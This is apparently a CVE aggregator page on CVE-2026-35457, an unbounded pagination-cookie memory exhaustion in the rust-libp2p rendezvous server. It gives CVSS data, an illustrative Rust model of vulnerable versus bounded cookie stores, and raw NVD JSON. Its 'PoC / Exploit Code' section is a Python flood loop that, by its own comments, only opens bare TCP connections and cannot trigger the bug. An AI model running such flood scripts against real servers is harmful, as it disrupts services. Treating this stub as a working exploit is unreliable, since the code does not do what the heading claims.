Security Vulnerability Report
CVE-2026-35457 CVSS 8.2 HIGH

CVE-2026-35457

Published: 2026-04-07 15:17:44
Last Modified: 2026-04-24 13:32:57

Description

libp2p-rust (github.com/libp2p/rust-libp2p) is the official Rust implementation of the libp2p networking stack. Before 0.17.1, the rendezvous server stores pagination cookies without any bound: each DISCOVER request causes the server to retain pagination state that is never evicted. An unauthenticated peer can therefore issue DISCOVER requests repeatedly and force unbounded memory growth on the server until it is exhausted (denial of service). This vulnerability is fixed in 0.17.1.
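The pattern the advisory describes, modelled in Rust as an added example (illustrative code written for this page, not rust-libp2p's rendezvous implementation): a cookie store that keeps every pagination cookie forever, beside a hardened store that binds each cookie to the peer it was issued to and caps cookies per peer and globally, evicting the oldest when a cap is hit. `PeerId`, `RegistrationId` and `Cookie` are placeholder integer types (real libp2p uses a `PeerId` and opaque cookie bytes), and the cap values, the FIFO eviction policy and the `flood` helper are assumptions chosen for the demonstration.

```rust
use std::collections::{HashMap, HashSet, VecDeque};

// Placeholder identifier types (assumption): real libp2p uses PeerId and opaque cookie bytes.
type PeerId = u32;
type RegistrationId = u64;
type Cookie = u64;

/// Model of the pre-0.17.1 behaviour (CWE-770): every DISCOVER that does not
/// continue a known cookie mints a new cookie whose state is kept indefinitely.
#[derive(Default)]
pub struct UnboundedCookies {
    next: Cookie,
    cookies: HashMap<Cookie, HashSet<RegistrationId>>,
}

impl UnboundedCookies {
    pub fn discover(&mut self, cookie: Option<Cookie>, page: &[RegistrationId]) -> Cookie {
        // Continue a known cookie's "already seen" set, otherwise start a new one.
        let mut seen = cookie.and_then(|c| self.cookies.remove(&c)).unwrap_or_default();
        seen.extend(page.iter().copied());
        let id = self.next;
        self.next += 1;
        self.cookies.insert(id, seen); // nothing ever removes this entry
        id
    }
    pub fn stored(&self) -> usize { self.cookies.len() }
}

/// Hardened model: cookies are bound to the requesting peer and capped both per
/// peer and globally; the oldest cookie is evicted when a cap would be exceeded.
pub struct BoundedCookies {
    max_per_peer: usize,
    max_total: usize,
    next: Cookie,
    cookies: HashMap<Cookie, (PeerId, HashSet<RegistrationId>)>,
    order: VecDeque<Cookie>, // global insertion order, oldest at the front
}

impl BoundedCookies {
    pub fn new(max_per_peer: usize, max_total: usize) -> Self {
        Self { max_per_peer, max_total, next: 0, cookies: HashMap::new(), order: VecDeque::new() }
    }

    fn evict(&mut self, cookie: Cookie) {
        self.cookies.remove(&cookie);
        self.order.retain(|c| *c != cookie);
    }

    pub fn discover(&mut self, peer: PeerId, cookie: Option<Cookie>, page: &[RegistrationId]) -> Cookie {
        // Honour a cookie only if it exists and was issued to this same peer;
        // a replayed or foreign cookie simply starts a fresh page.
        let mut seen = match cookie {
            Some(c) if self.cookies.get(&c).map_or(false, |(p, _)| *p == peer) => {
                let (_, seen) = self.cookies.remove(&c).unwrap();
                self.order.retain(|x| *x != c);
                seen
            }
            _ => HashSet::new(),
        };
        seen.extend(page.iter().copied());

        // Per-peer cap: one peer cannot hold more than max_per_peer cookies.
        while self.cookies.values().filter(|(p, _)| *p == peer).count() >= self.max_per_peer {
            let oldest = self.order.iter().copied()
                .find(|c| self.cookies[c].0 == peer)
                .expect("a counted cookie is always present in order");
            self.evict(oldest);
        }
        // Global cap: total state is bounded regardless of how many peers connect.
        while self.order.len() >= self.max_total {
            let oldest = self.order.pop_front().unwrap();
            self.cookies.remove(&oldest);
        }

        let id = self.next;
        self.next += 1;
        self.cookies.insert(id, (peer, seen));
        self.order.push_back(id);
        id
    }

    pub fn stored(&self) -> usize { self.cookies.len() }
    pub fn stored_for(&self, peer: PeerId) -> usize {
        self.cookies.values().filter(|(p, _)| *p == peer).count()
    }
}

/// One attacker peer sends `n` DISCOVER requests that never carry a cookie
/// (constructed input). Returns (entries kept by the unbounded store,
/// entries kept by the bounded store).
pub fn flood(n: usize) -> (usize, usize) {
    let mut vulnerable = UnboundedCookies::default();
    let mut hardened = BoundedCookies::new(16, 1024); // caps are assumptions
    let attacker: PeerId = 1;
    for i in 0..n {
        vulnerable.discover(None, &[i as RegistrationId]);
        hardened.discover(attacker, None, &[i as RegistrationId]);
    }
    (vulnerable.stored(), hardened.stored())
}

fn main() {
    let (unbounded, bounded) = flood(10_000);
    println!("unbounded store: {} cookies, bounded store: {} cookies", unbounded, bounded);
}
```

The unbounded store's size is exactly the number of DISCOVER requests the attacker sent, which is the growth the advisory describes; the bounded store never holds more than the per-peer cap for one peer, and a cookie presented by a different peer is ignored rather than consumed, so one client cannot disturb another's pagination either.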

CVSS Details

CVSS Score
8.2
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:H
Weakness
CWE-770 (Allocation of Resources Without Limits or Throttling)

Configurations (Affected Products)

cpe:2.3:a:protocol:libp2p:*:*:*:*:*:rust:*:* - VULNERABLE
libp2p-rust < 0.17.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import socket
import time

# Conceptual PoC for CVE-2026-35457.
# This script only simulates sending repeated DISCOVER requests to a libp2p
# rendezvous server: it opens raw TCP connections and never speaks the libp2p
# protocol (multistream-select, security handshake, stream muxer, rendezvous
# protobuf), so it cannot actually trigger the cookie-store growth. A real
# exploit would drive a libp2p client to send DISCOVER messages in a loop.

TARGET_IP = "127.0.0.1"
TARGET_PORT = 9999


def send_discover_flood():
    print(f"[*] Starting DoS flood on {TARGET_IP}:{TARGET_PORT}...")
    count = 0
    try:
        while True:
            # In a real scenario this would be a valid libp2p stream carrying
            # a DISCOVER message; here a bare TCP connection stands in for it.
            s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            s.connect((TARGET_IP, TARGET_PORT))
            # Logic to send a DISCOVER request would go here:
            # s.send(data)
            count += 1
            if count % 100 == 0:
                print(f"[*] Sent {count} requests. Memory growing...")
            # The socket is deliberately left open so the server keeps
            # per-connection state. Note that this exhausts the client's own
            # file descriptors long before it stresses a server; connect()
            # then raises and the loop ends.
            time.sleep(0.01)
    except KeyboardInterrupt:
        print("\n[!] Attack stopped by user.")
    except Exception as e:
        print(f"[!] Error: {e}")


if __name__ == "__main__":
    send_discover_flood()

References

https://github.com/libp2p/rust-libp2p/security/advisories/GHSA-v5hw-cv9c-rpg7 (Exploit, Vendor Advisory)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-35457", "sourceIdentifier": "[email protected]", "published": "2026-04-07T15:17:43.587", "lastModified": "2026-04-24T13:32:56.967", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "libp2p-rust is the official rust language Implementation of the libp2p networking stack. Prior to 0.17.1, the rendezvous server stores pagination cookies without bounds. An unauthenticated peer can repeatedly issue DISCOVER requests and force unbounded memory growth. This vulnerability is fixed in 0.17.1."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:H", "baseScore": 8.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 4.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-770"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:protocol:libp2p:*:*:*:*:*:rust:*:*", "versionEndExcluding": "0.17.1", "matchCriteriaId": "0EA2FB25-A1F1-4E02-A0C9-0BCC07AFCA5C"}]}]}], "references": [{"url": "https://github.com/libp2p/rust-libp2p/security/advisories/GHSA-v5hw-cv9c-rpg7", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}]}}